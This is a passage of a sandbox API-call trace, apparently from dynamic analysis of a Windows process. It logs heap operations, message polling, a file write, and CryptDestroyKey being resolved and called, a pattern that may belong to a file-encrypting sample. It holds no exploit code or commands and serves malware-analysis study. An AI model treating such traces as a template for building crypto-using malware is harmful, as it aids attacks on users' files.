[0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0f90 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf05d0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1a90 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x2e561a8 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2010 | out: hHeap=0x970000) returned 1 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0253.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf0050 [0253.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.662] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf0050*, nNumberOfBytesToWrite=0x578, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0050*, lpNumberOfBytesWritten=0x8cf5e4*=0x578, lpOverlapped=0x0) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0253.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0253.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0253.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0253.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0253.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.666] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0253.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0253.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0253.666] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0253.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.667] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0253.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0253.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0253.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0253.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51640, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.669] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0253.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.670] CryptDestroyKey (hKey=0xa87050) returned 1 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0270 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0253.671] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, 